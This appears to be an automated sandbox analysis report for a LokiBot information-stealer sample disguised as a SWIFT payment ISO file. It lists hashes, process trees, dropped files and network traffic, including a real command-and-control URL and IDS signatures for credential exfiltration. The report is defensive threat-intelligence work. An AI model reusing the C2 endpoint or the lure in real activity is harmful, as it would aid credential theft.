analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Payment Swift Copy HK LTGD #6736722.iso

Full analysis: https://app.any.run/tasks/768e6f78-bfe3-4551-a69a-b93b1501b0e2
Verdict: Malicious activity
Threats:

LokiBot was developed in 2015 to steal information from a variety of applications. Despite the age, this malware is still rather popular among cybercriminals.

Analysis date: December 18, 2018, 16:02:57
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
lokibot
Indicators:
MIME: application/x-iso9660-image
File info: ISO 9660 CD-ROM filesystem data 'Payment Swift Copy HK LTGD #6736'
MD5:

E0823F9E97AEF806C8F8B163129D00EC

SHA1:

3C4AC2D0F179F90E2583BC4C4968B9CE602A1E7D

SHA256:

787829C97DB186CFBC162A349F5D4AB5F256EA0B4BADFD996B6618FEDCF0CE2E

SSDEEP:

3072:q0wFY5FbfmPyg7DIFpRqzgxAxl+9BmntzFRoSxFEAWLT1djAB:q0ocFbfmP9DIFpRY7DQm9ob

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Payment Swift Copy HK LTGD #6736722.exe (PID: 3624)
      • Payment Swift Copy HK LTGD #6736722.exe (PID: 2872)
    • Detected artifacts of LokiBot

      • Payment Swift Copy HK LTGD #6736722.exe (PID: 3624)
    • LOKIBOT was detected

      • Payment Swift Copy HK LTGD #6736722.exe (PID: 3624)
    • Connects to CnC server

      • Payment Swift Copy HK LTGD #6736722.exe (PID: 3624)
    • Actions looks like stealing of personal data

      • Payment Swift Copy HK LTGD #6736722.exe (PID: 3624)
  • SUSPICIOUS

    • Application launched itself

      • Payment Swift Copy HK LTGD #6736722.exe (PID: 2872)
    • Loads DLL from Mozilla Firefox

      • Payment Swift Copy HK LTGD #6736722.exe (PID: 3624)
    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 2996)
      • Payment Swift Copy HK LTGD #6736722.exe (PID: 3624)
    • Creates files in the user directory

      • Payment Swift Copy HK LTGD #6736722.exe (PID: 3624)
      • notepad++.exe (PID: 1912)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.iso | ISO 9660 CD image (27.6)
.atn | Photoshop Action (27.1)
.gmc | Game Music Creator Music (6.1)

EXIF

ISO

System: Win32
VolumeName: Payment Swift Copy HK LTGD #6736
VolumeBlockCount: 168
VolumeBlockSize: 2048
RootDirectoryCreateDate: 2018:12:18 11:35:01+04:30
Software: PowerISO
VolumeCreateDate: 2018:12:18 11:35:01.00+04:30
VolumeModifyDate: 2018:12:18 11:35:01.00+04:30

Composite

VolumeSize: 336 kB
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
6
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start rundll32.exe no specs winrar.exe payment swift copy hk ltgd #6736722.exe no specs #LOKIBOT payment swift copy hk ltgd #6736722.exe notepad++.exe gup.exe

Process information

PID
CMD
Path
Indicators
Parent process
2812"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\Payment Swift Copy HK LTGD #6736722.isoC:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2996"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Payment Swift Copy HK LTGD #6736722.iso"C:\Program Files\WinRAR\WinRAR.exe
rundll32.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2872"C:\Users\admin\Desktop\Payment Swift Copy HK LTGD #6736722.exe" C:\Users\admin\Desktop\Payment Swift Copy HK LTGD #6736722.exeexplorer.exe
User:
admin
Company:
PHIliPs
Integrity Level:
MEDIUM
Description:
PIRifOrm LTD
Version:
1.00
3624"C:\Users\admin\Desktop\Payment Swift Copy HK LTGD #6736722.exe" C:\Users\admin\Desktop\Payment Swift Copy HK LTGD #6736722.exe
Payment Swift Copy HK LTGD #6736722.exe
User:
admin
Company:
PHIliPs
Integrity Level:
MEDIUM
Description:
PIRifOrm LTD
Version:
1.00
1912"C:\Program Files\Notepad++\notepad++.exe" "C:\Users\admin\Desktop\Payment Swift Copy HK LTGD #6736722.exe"C:\Program Files\Notepad++\notepad++.exe
explorer.exe
User:
admin
Company:
Integrity Level:
MEDIUM
Description:
Notepad++ : a free (GNU) source code editor
Exit code:
0
Version:
7.51
3748"C:\Program Files\Notepad++\updater\gup.exe" -v7.51C:\Program Files\Notepad++\updater\gup.exe
notepad++.exe
User:
admin
Company:
Integrity Level:
MEDIUM
Description:
GUP : a free (LGPL) Generic Updater
Exit code:
0
Version:
4.1
Total events
999
Read events
897
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
0
Text files
7
Unknown types
2

Dropped files

PID
Process
Filename
Type
3624Payment Swift Copy HK LTGD #6736722.exeC:\Users\admin\AppData\Roaming\F63AAA\A71D80.lck
MD5:
SHA256:
3624Payment Swift Copy HK LTGD #6736722.exeC:\Users\admin\AppData\Roaming\F63AAA\A71D80.exeexecutable
MD5:11A775B09526209FA1EF829042C34E4A
SHA256:CCB342A5293C4893089DB3EEE51056F54A88BD8695CD9C043624B5C1369F1505
2996WinRAR.exeC:\Users\admin\Desktop\Payment Swift Copy HK LTGD #6736722.exeexecutable
MD5:11A775B09526209FA1EF829042C34E4A
SHA256:CCB342A5293C4893089DB3EEE51056F54A88BD8695CD9C043624B5C1369F1505
3624Payment Swift Copy HK LTGD #6736722.exeC:\Users\admin\AppData\Roaming\F63AAA\A71D80.hdbtext
MD5:5302B1B5EC232D44E2D9507FB847FC49
SHA256:20B58A25872B1E3F7D47DAE0C090ACF229C49B6E33939934513499CC37BB2684
1912notepad++.exeC:\Users\admin\AppData\Roaming\Notepad++\session.xmltext
MD5:A8D78200679D57D072E78230E617800E
SHA256:3BC0E569B22343618299A53E6BEA804B4B3F5DF4A4BA04528080F34545AD6E3D
1912notepad++.exeC:\Users\admin\AppData\Roaming\Notepad++\config.xmlxml
MD5:31401E84150FDD475E79C0F607AF1D50
SHA256:AB20E3EAE7C4EF474F9C4C279BB5A94578E39EB2E363826065D3B037F367EC9D
1912notepad++.exeC:\Users\admin\AppData\Roaming\Notepad++\stylers.xmlxml
MD5:44982E1D48434C0AB3E8277E322DD1E4
SHA256:3E661D3F1FF3977B022A0ACC26B840B5E57D600BC03DCFC6BEFDB408C665904C
3624Payment Swift Copy HK LTGD #6736722.exeC:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2fdbf
MD5:18B8CFC0185C50383AAC0A4F30A9DAC8
SHA256:913E8CED6A447FE791954D382ABA52D490513C5D2F689B391866C7E561F89A03
1912notepad++.exeC:\Users\admin\AppData\Roaming\Notepad++\langs.xmlxml
MD5:E792264BEC29005B9044A435FBA185AB
SHA256:5298FD2F119C43D04F6CF831F379EC25B4156192278E40E458EC356F9B49D624
1912notepad++.exeC:\Users\admin\AppData\Roaming\Notepad++\plugins\Config\converter.initext
MD5:F70F579156C93B097E656CABA577A5C9
SHA256:B926498A19CA95DC28964B7336E5847107DD3C0F52C85195C135D9DD6CA402D4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
104.107.210.17:80
http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEBPqKHBb9OztDDZjCYBhQzY%3D
NL
der
471 b
whitelisted
3624
Payment Swift Copy HK LTGD #6736722.exe
POST
104.18.58.33:80
http://hgplls.tk/dei/fre.php
US
malicious
3624
Payment Swift Copy HK LTGD #6736722.exe
POST
104.18.58.33:80
http://hgplls.tk/dei/fre.php
US
malicious
GET
200
104.107.210.17:80
http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEAXk3DuUOKs7hZfLpqGYUOM%3D
NL
der
727 b
whitelisted
3624
Payment Swift Copy HK LTGD #6736722.exe
POST
104.18.58.33:80
http://hgplls.tk/dei/fre.php
US
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3748
gup.exe
37.59.28.236:443
notepad-plus-plus.org
OVH SAS
FR
whitelisted
104.107.210.17:80
ocsp.usertrust.com
Akamai International B.V.
NL
whitelisted
3624
Payment Swift Copy HK LTGD #6736722.exe
104.18.58.33:80
hgplls.tk
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
hgplls.tk
  • 104.18.58.33
  • 104.18.59.33
malicious
notepad-plus-plus.org
  • 37.59.28.236
whitelisted
ocsp.usertrust.com
  • 104.107.210.17
  • 104.107.210.34
whitelisted

Threats

PID
Process
Class
Message
3624
Payment Swift Copy HK LTGD #6736722.exe
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
3624
Payment Swift Copy HK LTGD #6736722.exe
A Network Trojan was detected
ET TROJAN LokiBot Checkin
3624
Payment Swift Copy HK LTGD #6736722.exe
Potentially Bad Traffic
ET POLICY HTTP Request to a *.tk domain
3624
Payment Swift Copy HK LTGD #6736722.exe
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
3624
Payment Swift Copy HK LTGD #6736722.exe
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
3624
Payment Swift Copy HK LTGD #6736722.exe
A Network Trojan was detected
MALWARE [PTsecurity] Loki Bot Check-in M2
3624
Payment Swift Copy HK LTGD #6736722.exe
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
3624
Payment Swift Copy HK LTGD #6736722.exe
A Network Trojan was detected
ET TROJAN LokiBot Checkin
3624
Payment Swift Copy HK LTGD #6736722.exe
Potentially Bad Traffic
ET POLICY HTTP Request to a *.tk domain
3624
Payment Swift Copy HK LTGD #6736722.exe
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
3 ETPRO signatures available at the full report
Process
Message
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
42C4C5846BB675C74E2B2C90C69AB44366401093